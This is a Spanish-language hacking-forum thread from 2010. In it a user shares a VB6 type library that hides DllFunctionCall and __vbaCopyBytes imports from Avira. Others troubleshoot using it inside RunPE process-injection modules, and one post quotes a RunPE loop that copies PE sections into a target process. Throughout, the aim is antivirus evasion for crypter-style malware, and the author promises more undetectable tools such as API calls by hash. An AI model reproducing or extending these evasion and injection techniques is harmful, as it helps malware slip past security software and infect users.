|
Título: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Karcrack en 24 Marzo 2010, 00:43 am Bueno, me han comentado que DllFunctionCall y __vbaCopyBytes es detectado por el paranoico de Avira... asi que aqui esta el TLB que debe hacer indetectable la llamada a estas APIs :D
Código: http://www.box.net/shared/58sikxl3nu (http://r.i.elhacker.net/cache?url=http://i.elhacker.net/i?i=3ywYW-tNnyjfxex52SWfzWVo) (http://i.elhacker.net/d?i=3ywYW-tNnyjfxex52SWfzWVo)Para gastarlo? Pues eliminar la declaracion de las APIs del codigo en VB y agregar el TLB a la lista de referencias: Proyecto->Referencias... (http://r.i.elhacker.net/cache?url=http://i.elhacker.net/i?i=Ak0jrPtZIdeNYlSsQQPByGVo) (http://i.elhacker.net/d?i=Ak0jrPtZIdeNYlSsQQPByGVo) Saludos :D Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: BlackZeroX en 29 Marzo 2010, 23:22 pm mmm pensaba que era el exe del PowerVB Type Library Editor mmm °°" Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Karcrack en 29 Marzo 2010, 23:37 pm mmm pensaba que era el exe del PowerVB Type Library Editor mmm °°" Si quieres el PowerVB Type Library Editor aqui lo tienes: Código: http://www.box.net/shared/tsn9ezoyc1 Sangrientas lunas >:D :xD Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Terabytes en 1 Abril 2010, 08:35 am mmm pensaba que era el exe del PowerVB Type Library Editor mmm °°" Si quieres el PowerVB Type Library Editor aqui lo tienes: Código: http://www.box.net/shared/tsn9ezoyc1 Sangrientas lunas >:D :xD Exelente gracias por el PowerVB Type Library Editor, lo estuve buscando en mayo :-X cuando salio el tuto de cobein. ahora si podre añadir las apis a VB6.DLL ;) Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: burbu_1 en 3 Abril 2010, 00:28 am hola, lo primero Karcrack, agradecerte tus aportes y programas que siempre son muy útiles ;-) ;-) ;-) ;-) ;-)
sobre el tlb.... lo he probado en un módulo cRunPE_PTR (de un tal Karcrack ;D) y lo puedo compilar, pero no me ejecuta el programa a inyectar.... :-\ alguna idea de qué puedo estar haciendo mal? Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Karcrack en 3 Abril 2010, 01:53 am hola, lo primero Karcrack, agradecerte tus aportes y programas que siempre son muy útiles ;-) ;-) ;-) ;-) ;-) Debuggea a ver... yo he tenido hoy mismo un problema similar, resulta que en la parte en la que se copian las secciones al nuevo proceso usando __vbaCopyBytes para leer el IMAGE_SECTION_HEADER hay un pequeño problema de punteros al hacerlo con el TLB que no he conseguido arreglar....sobre el tlb.... lo he probado en un módulo cRunPE_PTR (de un tal Karcrack ;D) y lo puedo compilar, pero no me ejecuta el programa a inyectar.... :-\ alguna idea de qué puedo estar haciendo mal? Para solucionarlo en ese parte he usado RtlMoveMemory envez de __vbaCopyBytes... No creo que haya forma de arreglar eso... Parece ser algo interno del VB... Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: tr1n1t1 en 3 Abril 2010, 18:35 pm Same here, project compile without problems but when running it says "Project1 stopped working" in Vista
Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: oijkn en 7 Abril 2010, 23:49 pm Hola Karcrack gracias para compartir tu TLB ya que en advancevb.com.ar he pedido ayuda ^^ aquí es mas fácil para mi porque entiendo mejor el español bueno aparte esto quería saber si tienes un nuevo RunPE o otro remedio en algunos cajones ^^ Tengo muchísimo respecto por ti y tu trabajo que es de p**a madre ! Gracias para ayudarme si no te molesta mucho :)
Oijkn. Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Karcrack en 8 Abril 2010, 00:38 am Hola Karcrack gracias para compartir tu TLB ya que en advancevb.com.ar he pedido ayuda ^^ aquí es mas fácil para mi porque entiendo mejor el español bueno aparte esto quería saber si tienes un nuevo RunPE o otro remedio en algunos cajones ^^ Tengo muchísimo respecto por ti y tu trabajo que es de p**a madre ! Gracias para ayudarme si no te molesta mucho :) Gracias a ti por el apoyo, de todas formas este tipo de cosas por MP ;)Oijkn. Y tranquilo, tengo muchas cositas guardadas >:D >:D A ver si esta semana saco el modulo que tengo para llamar a las APIs por HASH ;D Saludos ;) Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: oijkn en 8 Abril 2010, 21:35 pm Vale perdona por el fallo ^^ Esto no me estreñía amigo, seguro que en tus cajones tienes herramienta buenas ! Bueno voy esperando tu modulo a ver si puedo pasar las detecciones de esta dos API....
Saludos amigo :) Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: tr1n1t1 en 10 Abril 2010, 20:33 pm Para solucionarlo en ese parte he usado RtlMoveMemory envez de __vbaCopyBytes... No creo que haya forma de arreglar eso... Parece ser algo interno del VB... With RtlMoveMemory do I have to pass pointers or can I leave the RunPe as it is? Thanks for your work Karcrack Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Karcrack en 11 Abril 2010, 13:29 pm With RtlMoveMemory do I have to pass pointers or can I leave the RunPe as it is? RtlMoveMemory isn't in this TLB, anyway if you add it, remember to do it as ByRef, then you won't need to change the code.Thanks for your work Karcrack Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Pure Ice en 21 Mayo 2010, 18:34 pm Duda, haber si me a quedado claro :silbar::
Me estás diciendo, que modificando la TLB puedo modificar esta API: Private Declare Sub CopyBytes Lib "MSVBVM60.DLL" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any) A esto otro por ejemplo: Private Declare Sub CopyBytes Lib "MSVBVM60.DLL" Alias "Loqueyoquiera" (ByVal Size As Long, Dest As Any, Source As Any) Es esto así ? Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Karcrack en 21 Mayo 2010, 21:17 pm No, no lo has entendido...
Cambias la forma en que queda el API en el ejecutable...En vez de estar como de costumbre lo hace VB las añade en la IAT... Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Pure Ice en 24 Mayo 2010, 08:23 am No, no lo has entendido... Cambias la forma en que queda el API en el ejecutable...En vez de estar como de costumbre lo hace VB las añade en la IAT... Es decir, tu añades la TLB , y en el source la dejas tal cual, es decir la api de costumbre. Pero, en HEX por ejemplo ya no la encontrarás así, sino que será como tu lo hallas puesto en la TLB. Ahora sí ? PD: Gracias ;D Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: common26 en 20 Junio 2010, 20:06 pm Alhuien a logrado hacer funcionar Runpe con TLB = copybytes???
Esta es la parte peluda: For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1 Copybytes tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER) Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0 Next i Use mezcla de copybtes y copymem y nada :( Ayuda!!!! Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: Karcrack en 20 Junio 2010, 21:43 pm Hay un problema con VB6... por lo visto no funciona correctamente con estructuras y APIs definidas en TLB, a ver si durante esta semana saco tiempo y pongo la solucion, simplemente seria sacar el puntero correctamente usando alguna API :P
Saludos :D Título: Re: [TLB][VB6] Indetectar DllFunctionCall y CopyBytes Publicado por: common26 en 22 Junio 2010, 20:06 pm Hay un problema con VB6... por lo visto no funciona correctamente con estructuras y APIs definidas en TLB, a ver si durante esta semana saco tiempo y pongo la solucion, simplemente seria sacar el puntero correctamente usando alguna API :P Saludos :D Ojala puedas... ando encuero con ese API jodiendo :D Gracias de antemano!!! <cmm> |